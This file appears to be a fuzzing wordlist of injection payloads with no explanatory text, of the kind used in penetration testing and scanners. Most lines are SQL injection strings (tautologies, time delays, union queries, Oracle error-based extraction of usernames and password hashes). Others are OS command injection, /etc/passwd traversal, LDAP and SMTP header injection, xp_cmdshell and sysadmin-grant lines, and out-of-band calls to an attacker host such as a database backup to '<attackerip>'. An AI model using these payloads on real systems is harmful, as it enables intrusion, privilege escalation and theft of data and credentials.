' or 'something' like 'some%'
') and 0=benchmark(3000000,MD5(1))%20%23
y ' or 5 > 6
' or username like '%
"),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
(select benchmark(15000000,md5(0x4e446b6e))-9999) as test
(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(12)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/
'||utl_http.request('httP://192.168.1.1/')||'
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
$%26%26dir c:\
yor 1=1 --
&
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=4)) AND 'i'='i
1
& ping -n 30 127.0.0.1 &
' or 1=1
"),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'))%20waitfor%20delay%20'0:0:20'%20--
%0Aid%0A
)) and 0=benchmark(3000000,MD5(1))%20/*
",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
y ' or 2 between 1 and 3
',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
'%20or%20''='
declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
' or 4479=4479
|nid\n
; or '4479'='4479'
||+dir|c:\
(select 99999999 from pg_sleep(15)) as test
',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
or 0=0 --
?
"))) waitfor delay '0:0:20' /*
;netstat -a;
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=7)) AND 'i'='i
||/usr/bin/id|
' or 3=3
y ' or 3=3 --
or 4479=4479 --
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=3)) AND 'i'='i
") and 0=benchmark(3000000,MD5(1))%20/*
'
999999) or 1=1 or (1=1
;id
1%20and%20substring(version(),1,1)=5
or 'W'='W' --
select * from pg_group;
a);id|
' or 'W'='W' #
',NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
http://<yourservername>/
(select count(*) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3)
')))))) waitfor delay '0:0:20' /*
`ping 127.0.0.1`
limit
or 'W'='W' #"
999999 or 1=1 or 1=1
|/usr/bin/id|
a'
declare @q nvarchar (200) 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)
a);/usr/bin/id
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
& ping -i 30 127.0.0.1 &
declare @s varchar(22) select @s =
9999'||(select count(*) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5)||'9999
select * from master..sysserverse
t'exec master..xp_cmdshell 'nslookup www.google.com'--
--sp_password
asc
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=7)) AND 'i'='i
1 exec sp_ (or exec xp_)
handler
' or 1=1--
9999"||(select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3)||"9999
select * from sysusers
')))) waitfor delay '0:0:20' /*
'),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
2+union+(select+@@version,null,null,null,null,null,null,null,null,null,null,null+from+dual)
a|id
' union (select NULL, NULL, (select @@version)) --
select version();
',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
hi or a=a
procedure
' --
%0aDATA%0afoo%0a%2e%0aMAIL+FROM:+<youremail>%0aRCPT+TO:+<youremail>%0aDATA%0aFrom:+<youremail>%0aTo:+<youremail>%0aSubject:+tst%0afoo%0a%2e%0a
%28
a|/usr/bin/id
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20/*
PRINT @@variable
`ping 127.0.0.1`
%27%20or%201=1
declare @q nvarchar (200) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec(@q)
),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
y' AND members.email IS NULL; --
' or 119 > 30000001
PRINT @@variable
") and 0=benchmark(3000000,MD5(1))%20--
' union (select @@version) --
PRINT
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=8)) AND 'i'='i
\'; desc users; --
'1'OR'1°…
')) waitfor delay '0:0:20' /*
' or 10 > 9
hi' or 1=1 --
',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
| ping -i 30 127.0.0.1 |
response.write 111111
last
*(|(mail=*))
),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
exec(@s)
)))))) waitfor delay '0:0:20' --
")))) and 0=benchmark(3000000,MD5(1))%20/*
)))) and 0=benchmark(3000000,MD5(1))%20%23
select current_setting('log_statement');
'exec sp_addlogin 'name' , 'password' --
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
@var select @var as var into temp end --
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
or 1=1
,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
select current_setting('port');
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20%23
select * from syscat.dbauth where grantee = current user;
or 1=1 or ""=
' or 4479=4479 /*
!
a);/usr/bin/id|
",NULL)%20waitfor%20delay%20'0:0:20'%20/*
ping -i 30 127.0.0.1
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
having
x' AND email IS NULL; --
") waitfor delay '0:0:20' --
',NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
1 or benchmark(10000000,MD5(1))#
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
' or ''qwer''=''qwer''--
truncate
'),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
))) waitfor delay '0:0:20' /*
' or uname like '%
" and 0=benchmark(3000000,MD5(1))%20%23
'))) and 0=benchmark(3000000,MD5(1))%20/*
;system('cat%20/etc/passwd')
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=1)) AND 'i'='i
as
../../../../../../../../../../etc/passwd
2+union+(select+load_file('/etc/passwd'),null,null,null,null,null,null,null,null,null,null,null+from+dual)
(select count(*) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3) as test
%0a id %0a
a' or 1=1--
'%20or%20''='
' or 1 --'
x' AND 1=(SELECT COUNT(*) FROM tabname); --
; id
) waitfor delay '0:0:20' --
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=7)) AND 'i'='i
"))))) waitfor delay '0:0:20' --
select session_user from sysibm.sysdummy1;
"))) and 0=benchmark(3000000,MD5(1))%20/*
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=4)) AND 'i'='i
' and 1=( if((load_file(char(110,46,101,120,116))<>char(39,39)),1,0));
`id`
or 0=0 #"
' union (select NULL, NULL, NULL,  (select @@version)) --
@*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20--
')%20waitfor%20delay%20'0:0:20'%20--
" or 4479=4479 --
pg_sleep(__TIME__)--
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(granted_role) FROM (SELECT DISTINCT(granted_role), ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE=SYS.LOGINUSER) WHERE LIMIT=5)) AND 'i'='i
999999))) or 1=1 or (((1
' or '4479'='4479'--
' or '1'='1
')%20or%20('x'='x
a;/usr/bin/id|
x' OR full_name LIKE '%Bob%
')) waitfor delay '0:0:20' --
(select count(*) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3) as test
' or 'text' > 't'
select @@microsoftversione
or
"),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
<username>' OR 1=1--
//
--sp_password
))) and 0=benchmark(3000000,MD5(1))%20--
1 and user_name() = 'dbo'
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=7)) AND 'i'='i
' or 1=1 or ''='
ping -n 30
(select 99999999 from pg_sleep(15))
%0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+<youremail>%0d%0aRCPT+TO:+<youremail>%0d%0aDATA%0d%0aFrom:+<youremail>%0d%0aTo:+<youremail>%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20%23
)) and 0=benchmark(3000000,MD5(1))%20%23
or a=a
//
\n/usr/bin/id;
' or ''qwer''/*
"),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
',NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
' or ''qwer''=''qwer''--
9999'||(select like('abcdefg',upper(hex(randomblob(150000000)))))||'9999
') or 1=1 or ('1'='1
),NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
' union select
; ping 127.0.0.1 ;
ls -la /tmp
" or 4479=4479--
')))) and 0=benchmark(3000000,MD5(1))%20--
' or user like '%
a);id;
|id
distinct
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20/*
exec master..xp_cmdshell 'net+view'
or ''qwer''=''qwer'' or ""=
' or 4479 --'
1)) or pg_sleep(__TIME__)--
copy myfile from '/etc/passwd';
'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
';waitfor delay '0:0:__TIME__'--
or 0=0 #
create table myfile (input TEXT);
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20/*
<foo></foo>
or a = a
",(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))--
exec xp
'),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
+|+Dir+c:\
23 OR 1=1
"),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
' or '''qwer'''='''qwer''
xyz' OR 1%3D1+--
& ping -n 30 127.0.0.1 &
\nid|
,NULL)%20waitfor%20delay%20'0:0:20'%20/*
a;id
",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
")%20waitfor%20delay%20'0:0:20'%20--
*(|(objectclass=*))
"hi"") or (""a""=""a"
),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
' union (select NULL, NULL, NULL, NULL,  NULL, (select @@version)) --
<youremail>%0d%0aCc:<youremail>
",NULL)%20waitfor%20delay%20'0:0:20'%20--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
' or 4479/*
'))) or 1=1 or ((('1'='1
"a"" or 3=3--"
");waitfor delay '0:0:__TIME__'--
waitfor delay '0:0:20' /*
(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)
'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login >
'; exec master..xp_cmdshell
' or 1=1 --
//
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20%23
%29
,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
")) and 0=benchmark(3000000,MD5(1))%20/*
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=2)) AND 'i'='i
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20%23
1' and 1=(select count(*) from tablenames); --
+|+Dir+c:%2f
select name, tbname, coltype from sysibm.syscolumns;
') and 0=benchmark(3000000,MD5(1))%20/*
,NULL)%20waitfor%20delay%20'0:0:20'%20--
"),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
1||;select pg_sleep(2); °™
",NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(PASSWORD)) FROM SYS.USER$)) AND 'i'='i
*|
y' OR full_name LIKE '%Bob%
handler
tz_offset
) union select * from information_schema.tables;
')) or sleep(__TIME__)='
'))) and 0=benchmark(3000000,MD5(1))%20%23
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=1)) AND 'i'='i
'||Utl_Http.request('http://<yourservername>') from dual--
/
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=6)) AND 'i'='i
'||(elt(-3+5,bin(15),ord(10),hex(char(45))))
' exec sp_addsrvrolemember 'name' , 'sysadmin' --
a;/usr/bin/id
declare @q nvarchar (4000) select @q =
' and 1 = any (select 1 from users where FULL_NAME like '%%dministrator' and rownum<=1 and PASSWORD like '0%') and '1%%'='1
9999"||(select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)||"9999
1 or pg_sleep(__TIME__)--
BACKUP database master to disks='\\<attackerip>\<attackerip>\backupdb.dat'
"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20/*
<>"'%;)(&+
&apos;%20OR
9999"+(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7)+"9999
a' or 1=1--
),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
; id
'hi' or 'x'='x';
' -- &password=
))) waitfor delay '0:0:20' --
(select like('abcdefg',upper(hex(randomblob(150000000)))))
' UNION SELECT
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL)%20%23
0
hi') or ('a'='a
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20/*
9999'||(select count(*) from rdb$fields as t1,rdb$types as t2,rdb$collations as t3)||'9999
',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
a);id
and 0=benchmark(3000000,MD5(1))%20/*
'),NULL)%20waifor%20delay%20'0:0:20'%20/*
',NULL)%20waifor%20delay%20'0:0:20'%20/*
' or username like '%
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=2)) AND 'i'='i
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
%20'sleep%2050'
'sqlattempt1
' having 1=1--
hi' or 1=1 --
y ' or 10 > 9
' select * from information_schema.tables--
'),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
' AND 1=utl_inaddr.get_host_address((SELECT SYS.DATABASE_NAME FROM DUAL)) AND 'i'='i
' or 1=1 --
),NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
procedure
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL)%20--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--
' or 2 between 1 and 5
,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
asc
'),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
))) and 0=benchmark(3000000,MD5(1))%20%23
or 'W'='W' #
" and 0=benchmark(3000000,MD5(1))%20--
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
+|+dir+c:\+|
&apos;%20OR
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=8)) AND 'i'='i
" or ''qwer''=''qwer''--
1' or '1'='1
select system_user from sysibm.sysdummy1;
') or sleep(__TIME__)='
) or (a=a
//*
and 0=benchmark(3000000,MD5(1))%20%23
%0a+dir+c:%255c
'))%20waitfor%20delay%20'0:0:20'%20/*
))) and 0=benchmark(3000000,MD5(1))%20/*
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20%23
' or 4479=4479--
9999' or (select count(*) from INFORMATION_SCHEMA.tables as sys1,INFORMATION_SCHEMA.tables as sys2,INFORMATION_SCHEMA.tables as sys3,INFORMATION_SCHEMA.tables as sys4,INFORMATION_SCHEMA.tables as sys5,INFORMATION_SCHEMA.tables as sys6)=0 or '0'='9999
(select count(*) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7) as test
"+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
') or benchmark(10000000,MD5(1))#
'; if not(select system_user) <> 'sa' waitfor delay '0:0:2' --
select user from sysibm.sysdummy1;
' union+select+banner,null,null,null,null+from+v$version√ø
select current_setting('config_file');
`/usr/bin/id`
,(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
' union all select @@version--
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL)%20/*
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=8)) AND 'i'='i
|
' ; drop table temp --
' union select 1,2,3,x,x,x,x,@@version,x√ø
') or ('a'='a
' or sleep(__TIME__)#
xsstest
',NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
select versionnumber, version_timestamp from sysibm.sysversions;
1 uni/**/on select all from where
' AND 1=utl_inaddr.get_host_address((SELECT COUNT(DISTINCT(table_name)) FROM sys.all_tables)) AND 'i'='i
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20/*
like
*/*
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
' or 1=1
),NULL)%20waitfor%20delay%20'0:0:20'%20/*
*(|(objectclass=*))
' or 4479=4479 --
hi' or 'a'='a
or 4479=4479 or ""=
1)) or sleep(__TIME__)#
declare @s varchar (200) select @s = 0x73656c65637420404076657273696f6e exec(@s)
' UNION ALL SELECT
"),NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=5)) AND 'i'='i
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(PASSWORD) FROM (SELECT DISTINCT(PASSWORD), ROWNUM AS LIMIT FROM SYS.USER$) WHERE LIMIT=4)) AND 'i'='i
admin' or '
or a = a
anything' OR 'x'='x
(sqlattempt2)
' or 'W'='W' --
",NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
delete
PRINT
'))))) waitfor delay '0:0:20' /*
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(column_name) FROM (SELECT DISTINCT(column_name), ROWNUM AS LIMIT FROM all_tab_columns) WHERE LIMIT=6)) AND 'i'='i
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL)%20--
(sqlattempt2)
' or uid like '%
' union+select+owner,null,null,null,null+from+all_tables√ø
999999)) or 1=1 or ((1=1
%0a ping -i 30 127.0.0.1 %0a
") or benchmark(10000000,MD5(1))#
'||UTL_HTTP.REQUEST
' or ''qwer''=''qwer'' --
")) waitfor delay '0:0:20' /*
1'1
%0A/usr/bin/id%0A
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20/*
$+|+Dir+c:%2f
')%20waitfor%20delay%20'0:0:20'%20/*
x' or 1=1 or 'x'='y
a' or 3=3--
insert
x' or name()='username' or 'x'='y
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(USERNAME) FROM (SELECT DISTINCT(USERNAME), ROWNUM AS LIMIT FROM SYS.ALL_USERS) WHERE LIMIT=3)) AND 'i'='i
%26
create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile;
") and 0=benchmark(3000000,MD5(1))%20%23
' or '7659'='7659
0 or 1=1
%0Aid
")) waitfor delay '0:0:20' --
@variable
")))))) waitfor delay '0:0:20' --
a' waitfor delay '0:0:10'--
,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
" waitfor delay '0:0:20' --
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=1)) AND 'i'='i
')%20or%20('x'='x
or%201=1
' AND 1=utl_inaddr.get_host_address((SELECT banner FROM v$version WHERE ROWNUM=1)) AND 'i'='i
select current_setting('krb_server_keyfile');
' or '1'='1'--
'+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL)%20--
or 4479=4479
select current_setting('log_connections');
' waitfor delay '0:0:20' /*
",NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
' or a=a--
and 0=benchmark(3000000,MD5(1))%20--
%2A%28%7C%28objectclass%3D%2A%29%29
"))) and 0=benchmark(3000000,MD5(1))%20%23
' or 4479=4479 or ''='
1'or'1
%26%26+|+dir c:\
<youremail>%0aCc:<youremail>
or%201=1 --
' or 'something' = 'some'+'thing'
' or 1 in (@@version)--
'+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--
),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
)))) waitfor delay '0:0:20' --
' or '1'='1
$+|+Dir+c:\
'; if not(substring((select @@version),25,1) <> 5) waitfor delay '0:0:2' --
%26
xyz'  OR 1%253D1+--
' or 4 > 7
(select 99999999 from pg_sleep(15)) as test
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL)%20%23
delete
/
' AND 1=utl_inaddr.get_host_address((SELECT DISTINCT(table_name) FROM (SELECT DISTINCT(table_name), ROWNUM AS LIMIT FROM sys.all_tables) WHERE LIMIT=2)) AND 'i'='i
" or "a"="a
+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23
" or 1=1--
9999"||(select like('abcdefg',upper(hex(randomblob(150000000)))))||"9999
"),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--
y or 1=1 --
'),NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
select * from syscat.tabauth where grantee = current user;
having
<youremail>%0aBcc:<youremail>
1;(load_file(char(47,101,116,99,47,112,97,115,115,119,100))),1,1,1;
y ' or 3 > 1
' AND 1=utl_inaddr.get_host_address((SELECT host_name FROM v$instance)) AND 'i'='i
as
)))) and 0=benchmark(3000000,MD5(1))%20/*
),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20/*
waitfor delay '0:0:20' --
"),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*
%20$(sleep%2050)
' union select * from users where login = char(114,111,111,116);
+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL)%20--